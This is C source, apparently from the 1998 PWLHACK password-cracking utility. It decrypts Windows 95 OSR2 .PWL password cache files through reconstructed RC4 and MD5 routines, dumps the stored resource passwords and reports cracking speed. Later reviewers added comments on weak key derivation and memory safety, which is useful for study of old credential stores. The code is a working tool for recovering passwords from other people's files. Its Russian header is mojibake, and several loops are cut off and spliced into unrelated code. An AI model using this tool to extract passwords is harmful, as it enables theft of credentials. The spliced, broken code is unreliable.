(*Comment[1]/*)Program Comment{Ŀ
This is the Bonus Pack part of the PWLHACK v4.x cracking utility. It must
be distributed _FREELY_. You may use it for educational purposes. If You
want to add some functionality into PWLHACK itself - You can write to me
and ask me to do it. I written this product and I support it now! If You
will use some part of this source, Please, refer on me. Don't remove this
header, just compile or use with it! ;-)
FidoNet: 2:461/133.69 Hard Wisdom
E-Mail: hw@p69.f133.n461.z2.fidonet.org
祪, ⠢塞 PWLHACK v4.x ⨫⮩ PWL 䠩-
. , ᠬ ணࠬ, ࠭ ( -
࠭祭 - ). ᯮ짮 -
⥫ 楫, , ᥭ. 室
- ७ 㭪樮쭮 ᠬ ⨫ - ᥣ -
. 業ࠫ (ࠧ ᮧ ). -
짮 殢 ( ⥩) ணࠬ - ⥫쭮 -
뫪. 㤠 ⠢, ! ;-)
: 2:461/133.69 Hard Wisdom
-뫮: hw@p69.f133.n461.z2.fidonet.org
[]*/)={(int* )&Comment};
/*******************************************************************/
/* */
/* The MD95 OSR2 PWL's storage crypting method has been changed. */
/* This is the Security Madness to implement such protection on */
/* such Operating System, but. . . I present to You this. . . */
/* */
/* "The OSR2 .PWL's files Manager" v2.0 */
/* (C) 19-Mar-1998y by Hard Wisdom */
/* */
/*******************************************************************/
/*******************************************************************/
/* MSPWL32.dll - original offsets (for reference only): */
/* --------------------------------------------------------------- */
/* 7FC61CFE - NewCache opening procedure */
/* 7FC61F00 - NewCache find/use resource part */
/* 7FC63D6F - make_cryption_table() */
/* 7FC61C1F - check_cryption_sign() */
/* 7FC53F50 - init_hash() */
/* 7FC63F9A - add_hash() */
/* 7FC640B7 - flush_hash() */
/* 7FC6422A - calc_hash() */
/* 7FC61000 - init_xor_table() */
/* 7FC61088 - use_xor_table() */
/* --------------------------------------------------------------- */
/* Reconstruction is partial but the code peculiarity is preserved! */
/*******************************************************************/
#include /* using standard libraries: file io */
#include /* strings processing */
#include /* help routines */
#include /* time accessing */
#include /* dos breaking control */
/*******************************************************************/
/* Primitive fixed-size aliases, named as in Pascal.                  */
/* NOTE(review): the hashing code rotates dword as a 32-bit quantity  */
/* (see SwaBits) and the structs below are overlaid on raw file       */
/* bytes, so the listing assumes short = 16 bits, long = 32 bits and  */
/* no struct padding - confirm for any compiler other than the        */
/* original DOS one.                                                  */
typedef unsigned char byte; /* 8-bit unit */
typedef unsigned short word; /* assumed 16-bit */
typedef unsigned long dword; /* assumed 32-bit - wider on LP64 targets */
typedef dword hash_counters[0x04]; /* four running hash state words */
typedef byte hash_result[0x10]; /* 16-byte digest produced by flush_hash() */
typedef dword hash_key[0x10]; /* one 64-byte input block as sixteen words */
typedef struct { /* main hash container structure */
dword idx[0x02]; /* message length in bits: [0] low word, [1] high word */
hash_counters cnt; /* running state, seeded by init_hash() */
byte buf[0x40]; /* partially filled 64-byte input block */
hash_result res; /* digest bytes, valid only after flush_hash() */
dword unknown; /* purpose unknown, but present in code. I */
/* think this is some extension for future */
/* expanded cache handling, Ptr to Crypto? */
/* Not used now. */
} hash_container;
typedef struct { /* stream-cipher state built from the 16-byte hash */
dword magic; /* set to a fixed constant by make_cryption_table(); */
/* not read anywhere in this listing */
byte body[0x100]; /* 256-entry permutation table */
byte c1,c2; /* the two running indexes into body[] */
hash_result key; /* 16-byte key consumed by init_xor_table() */
} xor_table;
typedef struct { /* checking part into PWL header */
hash_result CryptoSign; /* stored encrypted; decrypted in place by callers */
hash_result CheckSign; /* compared against the hash of name + CryptoSign */
} check_pack;
/* PWL file header itself. Summing the field sizes without padding     */
/* puts Check at offset 0x252 (the value HdrOfs is required to hold)   */
/* and the end of ResOffsets at 0x290 (the first resource offset used  */
/* by dump_pwl_file).                                                  */
/* NOTE(review): every field is read straight from the file and must  */
/* be treated as untrusted until validated.                            */
typedef struct {
dword Sign; /* .PWL file signature */
dword UnknownC; /* ?? Strange counter */
byte ResLink[0x100]; /* Resource link index */
byte ResKey[0x100]; /* Resource key entry */
dword HdrOfs; /* Offset to CryptoHdr */
dword CryptoSeed[0x11]; /* [0..0x0F] per-resource seeds, [0x10] seed for Check */
word UnkAlign; /* ?? Just alignment */
check_pack Check; /* Checking crypt-sign */
word ResOffsets[0xF]; /* Resource offsets, stored encrypted */
} pwl_hdr;
/*=================================================================*/
/* Security Partition */
/*=================================================================*/
/* Build the 256-byte permutation in x->body from the 16-byte x->key.
 * The table starts as the identity and each position is then swapped
 * with a key-dependent position; this is the shape of the RC4 key
 * schedule with a 16-byte key. Both running indexes are reset to zero.
 * x->key must already be filled in by the caller. */
void init_xor_table(xor_table* x) {
 int n,acc,tmp;
 x->c1=0;
 x->c2=0;
 for (n=0;n<0x100;n++) x->body[n]=n; /* identity permutation */
 acc=0;
 for (n=0;n<0x100;n++) {
  /* key byte index wraps every 16 positions */
  acc=(acc+x->key[n & 0x0F]+x->body[n]) & 0xFF;
  tmp=x->body[n];
  x->body[n]=x->body[acc];
  x->body[acc]=tmp;
 }
}
/*=================================================================*/
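/* XOR datalen bytes at data with the keystream generated from x.
 * The same call encrypts and decrypts. The generator state (body, c1,
 * c2) is advanced and stored back, so consecutive calls continue the
 * same keystream. The update rule matches the RC4 output stage.
 *
 * The caller must guarantee that data really holds datalen writable
 * bytes; nothing here can check that.
 *
 * Change from the original: the cast-as-lvalue `*((byte*)data)++` is a
 * compiler extension and not valid C, so a typed cursor is used. */
void use_xor_table(xor_table* x, void* data, word datalen) {
 byte* out=(byte*)data;
 byte p1=x->c1,p2=x->c2,t;
 while (datalen--) {
  p1++;                        /* byte arithmetic wraps modulo 256 */
  p2+=x->body[p1];
  t=x->body[p1]; x->body[p1]=x->body[p2]; x->body[p2]=t;
  t+=x->body[p1];              /* index of the keystream byte */
  *out++^=x->body[t];
 }
 x->c1=p1; x->c2=p2;
}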
/*=================================================================*/
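/* Rotate the low 32 bits of Parm left by Where bit positions.
 *
 * The original expression `Parm >> 0x20 - Where` relied on operator
 * precedence and on dword being exactly 32 bits wide. Two problems are
 * removed here:
 *   - Where == 0 shifted by the full width, which is undefined;
 *   - where unsigned long is 64 bits, bits above bit 31 leaked into
 *     the result and the rotation was no longer a 32-bit rotation.
 * For Where in 1..31 on a 32-bit dword the result is unchanged. */
dword SwaBits(dword Parm, byte Where) {
 Parm&=0xFFFFFFFFUL;
 Where&=0x1F;
 if (Where==0) return Parm;
 return ((Parm << Where) | (Parm >> (0x20 - Where))) & 0xFFFFFFFFUL;
}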
/*=================================================================*/
/* Reset a hash container: clear the bit counter and load the four
 * initial state words. The values are the standard MD5 initial state.
 * buf, res and unknown are left untouched. */
void init_hash(hash_container* h) {
 static const dword iv[4]={0x67452301,0xEFCDAB89,0x98BADCFE,0x10325476};
 int n;
 h->idx[0]=0;
 h->idx[1]=0;
 for (n=0;n<4;n++) h->cnt[n]=iv[n];
}
/*=================================================================*/
/* Mix one 64-byte block k (sixteen words) into the four state words c.
 * c is updated in place; k is only read.
 *
 * The four groups of sixteen steps below use the round functions,
 * rotation amounts and message-word order of the MD5 compression
 * function (RFC 1321). The additive constants are the MD5 table
 * values; those with the top bit set are written as subtractions of
 * their two's complement (for example -0x28955b88 is +0xD76AA478
 * modulo 2^32).
 *
 * NOTE(review): the arithmetic is meant to be modulo 2^32. That holds
 * only if dword is 32 bits wide or SwaBits() discards higher bits -
 * confirm for the target compiler.
 *
 * Defensive reading: this is a single fast pass with no work factor,
 * which is why stores protected this way do not resist offline
 * guessing. */
void calc_hash(hash_counters c,hash_key k) { /* main hashing proc. */
dword p1,p2,p3,p4; /* working copies of the four state words */
p1=c[0]; p2=c[1]; p3=c[2]; p4=c[3];
/*---- round 1: (~b & d) | (b & c), rotations 7/12/17/22 -----------*/
p1+=((~p2 & p4) | (p2 & p3))+k[0x0]-0x28955b88; p1=SwaBits(p1,0x07)+p2;
p4+=((~p1 & p3) | (p1 & p2))+k[0x1]-0x173848AA; p4=SwaBits(p4,0x0C)+p1;
p3+=((~p4 & p2) | (p4 & p1))+k[0x2]+0x242070DB; p3=SwaBits(p3,0x11)+p4;
p2+=((~p3 & p1) | (p3 & p4))+k[0x3]-0x3E423112; p2=SwaBits(p2,0x16)+p3;
p1+=((~p2 & p4) | (p2 & p3))+k[0x4]-0x0A83F051; p1=SwaBits(p1,0x07)+p2;
p4+=((~p1 & p3) | (p1 & p2))+k[0x5]+0x4787C62A; p4=SwaBits(p4,0x0C)+p1;
p3+=((~p4 & p2) | (p4 & p1))+k[0x6]-0x57CFB9ED; p3=SwaBits(p3,0x11)+p4;
p2+=((~p3 & p1) | (p3 & p4))+k[0x7]-0x02B96AFF; p2=SwaBits(p2,0x16)+p3;
p1+=((~p2 & p4) | (p2 & p3))+k[0x8]+0x698098D8; p1=SwaBits(p1,0x07)+p2;
p4+=((~p1 & p3) | (p1 & p2))+k[0x9]-0x74BB0851; p4=SwaBits(p4,0x0C)+p1;
p3+=((~p4 & p2) | (p4 & p1))+k[0xA]-0x0000A44F; p3=SwaBits(p3,0x11)+p4;
p2+=((~p3 & p1) | (p3 & p4))+k[0xB]-0x76A32842; p2=SwaBits(p2,0x16)+p3;
p1+=((~p2 & p4) | (p2 & p3))+k[0xC]+0x6B901122; p1=SwaBits(p1,0x07)+p2;
p4+=((~p1 & p3) | (p1 & p2))+k[0xD]-0x02678E6D; p4=SwaBits(p4,0x0C)+p1;
p3+=((~p4 & p2) | (p4 & p1))+k[0xE]-0x5986BC72; p3=SwaBits(p3,0x11)+p4;
p2+=((~p3 & p1) | (p3 & p4))+k[0xF]+0x49B40821; p2=SwaBits(p2,0x16)+p3;
/*---- round 2: (~d & c) | (d & b), rotations 5/9/14/20 ------------*/
p1+=((~p4 & p3) | (p4 & p2))+k[0x1]-0x09E1DA9E; p1=SwaBits(p1,0x05)+p2;
p4+=((~p3 & p2) | (p3 & p1))+k[0x6]-0x3FBF4CC0; p4=SwaBits(p4,0x09)+p1;
p3+=((~p2 & p1) | (p2 & p4))+k[0xB]+0x265E5A51; p3=SwaBits(p3,0x0E)+p4;
p2+=((~p1 & p4) | (p1 & p3))+k[0x0]-0x16493856; p2=SwaBits(p2,0x14)+p3;
p1+=((~p4 & p3) | (p4 & p2))+k[0x5]-0x29D0EFA3; p1=SwaBits(p1,0x05)+p2;
p4+=((~p3 & p2) | (p3 & p1))+k[0xA]+0x02441453; p4=SwaBits(p4,0x09)+p1;
p3+=((~p2 & p1) | (p2 & p4))+k[0xF]-0x275E197F; p3=SwaBits(p3,0x0E)+p4;
p2+=((~p1 & p4) | (p1 & p3))+k[0x4]-0x182C0438; p2=SwaBits(p2,0x14)+p3;
p1+=((~p4 & p3) | (p4 & p2))+k[0x9]+0x21E1CDE6; p1=SwaBits(p1,0x05)+p2;
p4+=((~p3 & p2) | (p3 & p1))+k[0xE]-0x3CC8F82A; p4=SwaBits(p4,0x09)+p1;
p3+=((~p2 & p1) | (p2 & p4))+k[0x3]-0x0B2AF279; p3=SwaBits(p3,0x0E)+p4;
p2+=((~p1 & p4) | (p1 & p3))+k[0x8]+0x455A14ED; p2=SwaBits(p2,0x14)+p3;
p1+=((~p4 & p3) | (p4 & p2))+k[0xD]-0x561C16FB; p1=SwaBits(p1,0x05)+p2;
p4+=((~p3 & p2) | (p3 & p1))+k[0x2]-0x03105C08; p4=SwaBits(p4,0x09)+p1;
p3+=((~p2 & p1) | (p2 & p4))+k[0x7]+0x676F02D9; p3=SwaBits(p3,0x0E)+p4;
p2+=((~p1 & p4) | (p1 & p3))+k[0xC]-0x72D5B376; p2=SwaBits(p2,0x14)+p3;
/*---- round 3: b ^ c ^ d, rotations 4/11/16/23 --------------------*/
p1+=(p4 ^ p3 ^ p2)+k[0x5]-0x0005C6BE; p1=SwaBits(p1,0x04)+p2;
p4+=(p3 ^ p2 ^ p1)+k[0x8]-0x788E097F; p4=SwaBits(p4,0x0B)+p1;
p3+=(p4 ^ p2 ^ p1)+k[0xB]+0x6D9D6122; p3=SwaBits(p3,0x10)+p4;
p2+=(p4 ^ p3 ^ p1)+k[0xE]-0x021AC7F4; p2=SwaBits(p2,0x17)+p3;
p1+=(p4 ^ p3 ^ p2)+k[0x1]-0x5B4115BC; p1=SwaBits(p1,0x04)+p2;
p4+=(p3 ^ p2 ^ p1)+k[0x4]+0x4BDECFA9; p4=SwaBits(p4,0x0B)+p1;
p3+=(p4 ^ p2 ^ p1)+k[0x7]-0x0944B4A0; p3=SwaBits(p3,0x10)+p4;
p2+=(p4 ^ p3 ^ p1)+k[0xA]-0x41404390; p2=SwaBits(p2,0x17)+p3;
p1+=(p4 ^ p3 ^ p2)+k[0xD]+0x289B7EC6; p1=SwaBits(p1,0x04)+p2;
p4+=(p3 ^ p2 ^ p1)+k[0x0]-0x155ED806; p4=SwaBits(p4,0x0B)+p1;
p3+=(p4 ^ p2 ^ p1)+k[0x3]-0x2B10CF7B; p3=SwaBits(p3,0x10)+p4;
p2+=(p4 ^ p3 ^ p1)+k[0x6]+0x04881D05; p2=SwaBits(p2,0x17)+p3;
p1+=(p4 ^ p3 ^ p2)+k[0x9]-0x262B2FC7; p1=SwaBits(p1,0x04)+p2;
p4+=(p3 ^ p2 ^ p1)+k[0xC]-0x1924661B; p4=SwaBits(p4,0x0B)+p1;
p3+=(p4 ^ p2 ^ p1)+k[0xF]+0x1FA27CF8; p3=SwaBits(p3,0x10)+p4;
p2+=(p4 ^ p3 ^ p1)+k[0x2]-0x3B53A99B; p2=SwaBits(p2,0x17)+p3;
/*---- round 4: (~d | b) ^ c, rotations 6/10/15/21 -----------------*/
p1+=((~p4 | p2) ^ p3)+k[0x0]-0x0BD6DDBC; p1=SwaBits(p1,0x06)+p2;
p4+=((~p3 | p1) ^ p2)+k[0x7]+0x432AFF97; p4=SwaBits(p4,0x0A)+p1;
p3+=((~p2 | p4) ^ p1)+k[0xE]-0x546BDC59; p3=SwaBits(p3,0x0F)+p4;
p2+=((~p1 | p3) ^ p4)+k[0x5]-0x036C5FC7; p2=SwaBits(p2,0x15)+p3;
p1+=((~p4 | p2) ^ p3)+k[0xC]+0x655B59C3; p1=SwaBits(p1,0x06)+p2;
p4+=((~p3 | p1) ^ p2)+k[0x3]-0x70F3336E; p4=SwaBits(p4,0x0A)+p1;
p3+=((~p2 | p4) ^ p1)+k[0xA]-0x00100B83; p3=SwaBits(p3,0x0F)+p4;
p2+=((~p1 | p3) ^ p4)+k[0x1]-0x7A7BA22F; p2=SwaBits(p2,0x15)+p3;
p1+=((~p4 | p2) ^ p3)+k[0x8]+0x6FA87E4F; p1=SwaBits(p1,0x06)+p2;
p4+=((~p3 | p1) ^ p2)+k[0xF]-0x01D31920; p4=SwaBits(p4,0x0A)+p1;
p3+=((~p2 | p4) ^ p1)+k[0x6]-0x5CFEBCEC; p3=SwaBits(p3,0x0F)+p4;
p2+=((~p1 | p3) ^ p4)+k[0xD]+0x4E0811A1; p2=SwaBits(p2,0x15)+p3;
p1+=((~p4 | p2) ^ p3)+k[0x4]-0x08AC817E; p1=SwaBits(p1,0x06)+p2;
p4+=((~p3 | p1) ^ p2)+k[0xB]-0x42C50DCB; p4=SwaBits(p4,0x0A)+p1;
p3+=((~p2 | p4) ^ p1)+k[0x2]+0x2AD7D2BB; p3=SwaBits(p3,0x0F)+p4;
p2+=((~p1 | p3) ^ p4)+k[0x9]-0x14792C6F; p2=SwaBits(p2,0x15)+p3;
/*---- fold the block result back into the running state -----------*/
c[0]+=p1; c[1]+=p2; c[2]+=p3; c[3]+=p4;
}
/*=================================================================*/
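/* Feed datalen bytes from data into the running hash in cont.
 * Bytes are appended to cont->buf; every time the 64-byte buffer is
 * full it is packed into sixteen little-endian words and mixed into
 * cont->cnt by calc_hash(). The 64-bit bit counter in cont->idx is
 * advanced first, with a carry into idx[1] when idx[0] wraps.
 *
 * cont must have been prepared with init_hash(). data must hold at
 * least datalen readable bytes.
 *
 * Changes from the original:
 *   - `*((byte*)data)++` (cast used as an lvalue) is not valid C and
 *     is replaced by a typed read cursor;
 *   - datalen is widened to dword before `<< 3`, so the bit count is
 *     not truncated where int is 16 bits wide. */
void add_hash(hash_container* cont, void* data, word datalen) {
 hash_key k;
 const byte* src=(const byte*)data;
 dword bits=(dword)datalen << 3;          /* length of this chunk in bits */
 dword pos=(cont->idx[0]>>3) & 0x3F;      /* bytes already waiting in buf */
 dword w,o;
 if (bits+cont->idx[0] < cont->idx[0]) cont->idx[1]++; /* carry out of idx[0] */
 cont->idx[0]+=bits;
 cont->idx[1]+=(dword)datalen >> 0x1D;    /* always 0 for a 16-bit datalen */
 while (datalen--) {
  cont->buf[pos]=*src++;
  if (++pos==0x40) {
   /* buffer full: pack it as little-endian words and compress */
   for (w=0,o=0;w<0x10;w++,o+=4)
    k[w]=((dword)cont->buf[o+0] << 0x00)+
         ((dword)cont->buf[o+1] << 0x08)+
         ((dword)cont->buf[o+2] << 0x10)+
         ((dword)cont->buf[o+3] << 0x18);
   calc_hash(cont->cnt,k);
   pos=0;
  }
 }
}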
/*=================================================================*/
/* Finish the hash: pad the buffered data, append the message length
 * and write the 16-byte digest to cont->res (little-endian state
 * words).
 *
 * The bit length is copied out of cont->idx BEFORE the padding is
 * added, because add_hash() advances cont->idx while it consumes the
 * padding bytes. The original author flagged this ordering with a
 * "BUG" remark; the capture has to stay ahead of the add_hash() call.
 *
 * Padding is a single 0x80 byte followed by zeros, up to offset 0x38
 * of a block (spilling into the next block when fewer than 8 bytes
 * remain free). */
void flush_hash(hash_container* cont) {
 byte pad[0x40]={0x80};                /* 0x80 then 63 zero bytes */
 hash_key blk;
 dword used,padlen,w,o;
 blk[0x0E]=cont->idx[0];               /* message length, low word */
 blk[0x0F]=cont->idx[1];               /* message length, high word */
 used=(cont->idx[0]>>3) & 0x3F;
 padlen=(used<0x38)?0x38-used:0x78-used;
 add_hash(cont,pad,padlen);
 /* the first 56 buffered bytes become words 0..13 of the last block */
 for (w=0,o=0;w<0x0E;w++,o+=4)
  blk[w]=((dword)cont->buf[o+1] << 0x08)+
         ((dword)cont->buf[o+3] << 0x18)+
         ((dword)cont->buf[o+2] << 0x10)+
         ((dword)cont->buf[o+0] << 0x00);
 calc_hash(cont->cnt,blk);
 /* serialise the state words, least significant byte first */
 for (w=0,o=0;w<0x04;w++,o+=4) {
  cont->res[o+0]=cont->cnt[w] >> 0x00;
  cont->res[o+1]=cont->cnt[w] >> 0x08;
  cont->res[o+2]=cont->cnt[w] >> 0x10;
  cont->res[o+3]=cont->cnt[w] >> 0x18;
 }
}
/*=================================================================*/
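/* Overwrite n bytes at p with zeros through a volatile pointer, so
 * the stores are not removed as dead writes. */
static void pwl_scrub(void* p, unsigned n) {
 volatile byte* b=(volatile byte*)p;
 while (n--) *b++=0;
}
/* Derive the cipher table t for one user and one seed pair.
 *
 *   h1  = hash(Seed1 bytes, name including its NUL, Seed2 bytes)
 *   h2  = hash(pwd including its NUL, h1 digest)
 *   key = h2 digest, then init_xor_table(t)
 *
 * name and pwd must be NUL-terminated strings. The seeds are hashed as
 * sizeof(dword) raw bytes in host byte order, so the result depends on
 * dword being 32 bits and little-endian as on the original platform.
 *
 * Defensive reading: the key comes from two single hash passes with
 * no iteration count, so each guess costs almost nothing to test.
 *
 * Change from the original: the two `memchr(&h, sizeof(h), 0)` calls
 * (marked "BUG" by the author) only searched memory and cleared
 * nothing, leaving password-derived hash state on the stack. Both
 * containers are now actually zeroed. t->key intentionally keeps the
 * derived key, since the table needs it. */
void make_cryption_table(xor_table* t, char* name, char* pwd,
 dword Seed1, dword Seed2) {
 hash_container h1,h2;
 t->magic=0x7FC64FD8;                   /* constant kept from the DLL */
 init_hash(&h1);
 add_hash(&h1,&Seed1,sizeof(Seed1));
 add_hash(&h1,name,strlen(name)+1);
 add_hash(&h1,&Seed2,sizeof(Seed2));
 flush_hash(&h1);
 init_hash(&h2);
 add_hash(&h2,pwd,strlen(pwd)+1);
 add_hash(&h2,&h1.res,sizeof(h1.res));
 flush_hash(&h2);
 memcpy(t->key,h2.res,sizeof(h2.res));  /* the only place the key is set */
 pwl_scrub(&h1,sizeof(h1));
 pwl_scrub(&h2,sizeof(h2));
 init_xor_table(t);
}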
/*=================================================================*/
/* Verify a decrypted check pack.
 * Hashes name (with its terminating NUL) followed by the 16 bytes of
 * CryptoSign and compares the digest with CheckSign.
 * Returns 0 when they match, non-zero otherwise (memcmp result).
 * A match only shows that the 16-byte signature is consistent; the
 * callers in this file report it as "maybe correct". */
int check_cryption_sign(char* name, hash_result CryptoSign,
 hash_result CheckSign) {
 hash_container ctx;
 init_hash(&ctx);
 add_hash(&ctx,name,strlen(name)+1);
 add_hash(&ctx,CryptoSign,sizeof(hash_result));
 flush_hash(&ctx);
 return memcmp(ctx.res,CheckSign,sizeof(hash_result));
}
/*=================================================================*/
/* Service Partition */
/*=================================================================*/
/* Report a fatal condition and terminate.
 * Prints "Error (num): s!" on standard output and exits with num as
 * the process status. Never returns; open files are not closed here
 * beyond what exit() itself does. */
void error(int num, char* s) {
 printf("Error (%d): %s!\n",num,s);
 exit(num);
}
/*=================================================================*/
/* Return the zero-based index of the first occurrence of c in s,
 * or -1 when c does not occur. The terminating NUL is never matched,
 * so LookUp(s, 0) is always -1. */
int LookUp(char* s, char c) {
 int pos;
 for (pos=0;s[pos]!=0;pos++)
  if (s[pos]==c) return pos;
 return -1;
}
/*=================================================================*/
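/* Upper-case a NUL-terminated string in place and return s.
 * Handles ASCII a-z and the two lower-case Cyrillic ranges of code
 * page 866.
 *
 * NOTE(review): the Cyrillic character literals of the original were
 * lost when this listing was extracted (they appear as empty ''), so
 * the two ranges are restored from the CP866 layout as byte values:
 *   0xA0..0xAF -> 0x80..0x8F   and   0xE0..0xEF -> 0x90..0x9F.
 * Confirm against the original archive.
 *
 * The original also modified *s and s inside one expression
 * (`*s++ = ... *s = ...`), which is unsequenced; each character is
 * now read, converted and stored in separate steps. */
char* UpStr(char* s) {
 char* p;
 unsigned char ch;
 for (p=s;*p;p++) {
  ch=(unsigned char)*p;   /* unsigned so bytes above 0x7F compare correctly */
  if (ch>='a' && ch<='z') ch=(unsigned char)(ch-'a'+'A');
  else if (ch>=0xA0 && ch<=0xAF) ch=(unsigned char)(ch-0x20);
  else if (ch>=0xE0 && ch<=0xEF) ch=(unsigned char)(ch-0x50);
  *p=(char)ch;
 }
 return s;
}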
/*=================================================================*/
/* Cut the string at its first line feed (0x0A) and return s.
 * Text after the line feed stays in memory but is no longer part of
 * the string. A carriage return (0x0D) is not treated specially. */
char* LnTrim(char* s) {
 char* p=s;
 while (*p!=0x00 && *p!=0x0A) p++;
 *p=0x00;
 return s;
}
/*=================================================================*/
/* Main Partition */
/*=================================================================*/
#define MaxPwlSize 0x1000 /* largest PWL file accepted; also sizeof File.buf */
#define PwlSign 0x968582E3 /* required value of pwl_hdr.Sign */
#define PwlHdr 0x252 /* required value of pwl_hdr.HdrOfs */
#define MaxEnumPwd 0x20 /* not referenced in the visible part of this listing */
#define SessionFile "PWLOSR.BRK" /* written by the break handler on interrupt */
#define InitializeFile "PWLOSR.INI" /* holds the enumeration character set */
/* In-memory image of one PWL file: the raw bytes, viewable either as  */
/* a header or as a flat buffer, plus offsets and sizes derived from   */
/* the header.                                                         */
/* NOTE(review): dump_pwl_file fills ResEntry from the decrypted       */
/* ResOffsets and the file size, then uses ResEntry[i] and ResSz[i]    */
/* as an index into and a length over File.buf. No range check         */
/* against MaxPwlSize is visible in this listing, so a malformed file  */
/* can drive accesses outside buf - validate before use.               */
typedef struct { /* internal PWL file representation */
union { /* with supplementary fields */
pwl_hdr Hdr; /* structured view of the first bytes */
byte buf[MaxPwlSize]; /* flat view of the whole file */
} File;
word ResEntry[0x11]; /* start offset of each resource, plus an end marker */
word ResSz[0x10]; /* ResEntry[i+1]-ResEntry[i], computed modulo 0x10000 */
} PwlFile;
/*=================================================================*/
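/* Load a PWL file into *b and validate its fixed header fields.
 *
 * pwd_file  path of the file to read
 * b         receives the file image; it is zeroed first, so bytes past
 *           the end of the file and the ResEntry/ResSz arrays never
 *           hold stale stack contents
 * returns   the file size in bytes
 *
 * Any failure ends the program through error(): code 2 for I/O
 * problems and oversized files, code 1 for a wrong signature, a wrong
 * header offset or a file too short to contain a header.
 *
 * Changes from the original:
 *   - ferror() was called after fclose(), i.e. on a closed stream;
 *     the stream status is now sampled before closing;
 *   - the size limit is enforced before reading, and only the file's
 *     own bytes are read into File.buf (the original asked fread for
 *     sizeof(PwlFile) bytes and ignored its result);
 *   - fseek/ftell failures and short reads are reported;
 *   - a file shorter than the header is rejected instead of being
 *     parsed from uninitialised memory. */
dword read_pwl_file(char* pwd_file,PwlFile* b) {
 FILE* f; long len; dword sz; size_t got; int io_err; char s[256];
 if ((f=fopen(pwd_file,"rb"))==NULL)
  error(2,"Can't open necessary PWL file");
 if (fseek(f,0,SEEK_END)!=0 || (len=ftell(f))<0 || fseek(f,0,SEEK_SET)!=0) {
  fclose(f);
  error(2,"I/O failure during reading PWL file");
 }
 if (len>MaxPwlSize) {
  fclose(f);
  error(2,"Desired PWL file too large for analysing");
 }
 sz=(dword)len;
 memset(b,0,sizeof(PwlFile));
 got=fread(b->File.buf,1,(size_t)sz,f);
 io_err=ferror(f) || got!=(size_t)sz;   /* check while the stream is open */
 fclose(f);
 if (io_err) error(2,"I/O failure during reading PWL file");
 if (sz<sizeof(pwl_hdr)) error(1,"PWL file is too short to hold a header");
 sprintf(s,"%.8lX - %s",
  b->File.Hdr.Sign,"Oops, This Version is not supported");
 if (b->File.Hdr.Sign!=PwlSign) error(1,s);
 sprintf(s,"%.8lX - %s",b->File.Hdr.HdrOfs,"Invalid header offset");
 if (b->File.Hdr.HdrOfs!=PwlHdr) error(1,s);
 return sz;
}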
/*=================================================================*/
void dump_pwl_file(char* pwd_file, char* pwd_name, char* pwd_pass, int p) {
PwlFile b; FILE* f; dword sz; char s[256]; xor_table x;
int r,i,j,jj,tr0,tr1,k,kk;
sz=read_pwl_file(pwd_file,&b);
/*-----------------------------------------------------------------*/
printf("File: '%s' has size %lXh bytes\n",pwd_file,sz);
printf("for user '%s' with password '%s' contains:\n\n",pwd_name,pwd_pass);
/*-----------------------------------------------------------------*/
make_cryption_table(&x,pwd_name,pwd_pass,-1,b.File.Hdr.CryptoSeed[0x10]);
use_xor_table(&x,&b.File.Hdr.Check,sizeof(b.File.Hdr.Check));
use_xor_table(&x,&b.File.Hdr.ResOffsets,sizeof(b.File.Hdr.ResOffsets));
r=check_cryption_sign(pwd_name,b.File.Hdr.Check.CryptoSign,
b.File.Hdr.Check.CheckSign);
if (r) error(1,"Sorry, invalid UserName or Password have been entered");
b.ResEntry[0]=0x290; b.ResEntry[0x10]=sz;
for (i=0;i<0x0F;i++) b.ResEntry[i+1]=b.File.Hdr.ResOffsets[i];
for (i=0;i<0x10;i++) b.ResSz[i]=b.ResEntry[i+1]-b.ResEntry[i];
for (i=0;i<0x10;i++) {
make_cryption_table(&x,pwd_name,pwd_pass,i,b.File.Hdr.CryptoSeed[i]);
use_xor_table(&x,&b.File.buf[b.ResEntry[i]],b.ResSz[i]);
}
/*-----------------------------------------------------------------*/
if (p) {
printf("-[Technical Information]---------------------------------------\n");
printf(" Password file version: %.8lX; Offset to Header: %.8lX\n",
b.File.Hdr.Sign,b.File.Hdr.HdrOfs);
printf(" Unknown Align: %.4X; UnkCount: %.8lX; CheckSeed: %.8lX\n",
b.File.Hdr.UnkAlign,b.File.Hdr.UnknownC,
b.File.Hdr.CryptoSeed[0x10]);
printf(" CryptoSeed Array = ( %.8lX",b.File.Hdr.CryptoSeed[0]);
for (i=1;i<0x10;printf("%s%.8lX",!(i&0x3)?"\n ":", ",
b.File.Hdr.CryptoSeed[i]),i++);
printf(" )\n");
printf("-[Resources pointers]------------------------------------------");
for (i=0;i<0x100;printf("%s%.2hX",!(i&0xF)?"\n":
!(i&0x7)?" - ":" ",
b.File.Hdr.ResLink[i]),i++);
printf("\n-[Resources key indexes]---------------------------------------");
for (i=0;i<0x100;printf("%s%.2hX",!(i&0xF)?"\n":
!(i&0x7)?" - ":" ",
b.File.Hdr.ResKey[i]),i++); printf("\n");
printf("---------------------------------------------------------------\n");
printf(" CryptoSign = "); for (i=0;i<0x10;printf(" %.2hX",
b.File.Hdr.Check.CryptoSign[i++]));
printf("\n CheckoSign = "); for (i=0;i<0x10;printf(" %.2hX",
b.File.Hdr.Check.CheckSign[i++])); printf("\n");
printf("---------------------------------------------------------------\n");
printf(" Data = ( %.4X",b.ResEntry[0]);
for (i=1;i<0x11;printf("%s%.4X",i==9?"\n ":", ",
b.ResEntry[i]),i++); printf(" )\n");
printf(" Len. = ( %.4X",b.ResSz[0]-2);
for (i=1;i<0x10;printf("%s%.4X",i==9?"\n ":", ",
b.ResSz[i]-2),i++); printf(" )\n");
printf("-[Dump]--------------------------------------------------------");
for (j=0,i=b.ResEntry[0x0];i32?b.File.buf[i]:'.');
j=(j==15)?0:j+1;
}; printf("\n");
printf("---------------------------------------------------------------\n");
printf("\n");
}
/*-----------------------------------------------------------------*/
printf("-[Type]-[The resource location string]--------------[Password]-\n");
tr0=0,tr1=0; for (i=0;i<0x10;i++) if (b.ResSz[i]>8) {
j=b.ResEntry[i]; jj=b.ResEntry[i+1]-2; tr0++;
while (j1000?t/1000*55:t*55/1000;
printf("Elapsed time %lu seconds; Average speed %lu passwords per second.\n",
t,t>0?pwd_cnt/t:pwd_cnt);
printf("Cracked passwords %u. %s.\n",pwd_ok,
pwd_ok!=0?"Check them under MD95 Logon":
"Sorry, Today is not Your day");
if (pwd_fault) {
if ((f=fopen(SessionFile,"wb"))==NULL)
error(2,"Can't create session RIP file");
if (hdl_type)
fprintf(f,"$%s\r\n%s\r\n%s\r\n%lu\r\n",rip_name,rip_user,rip_voc,rip_pos);
else
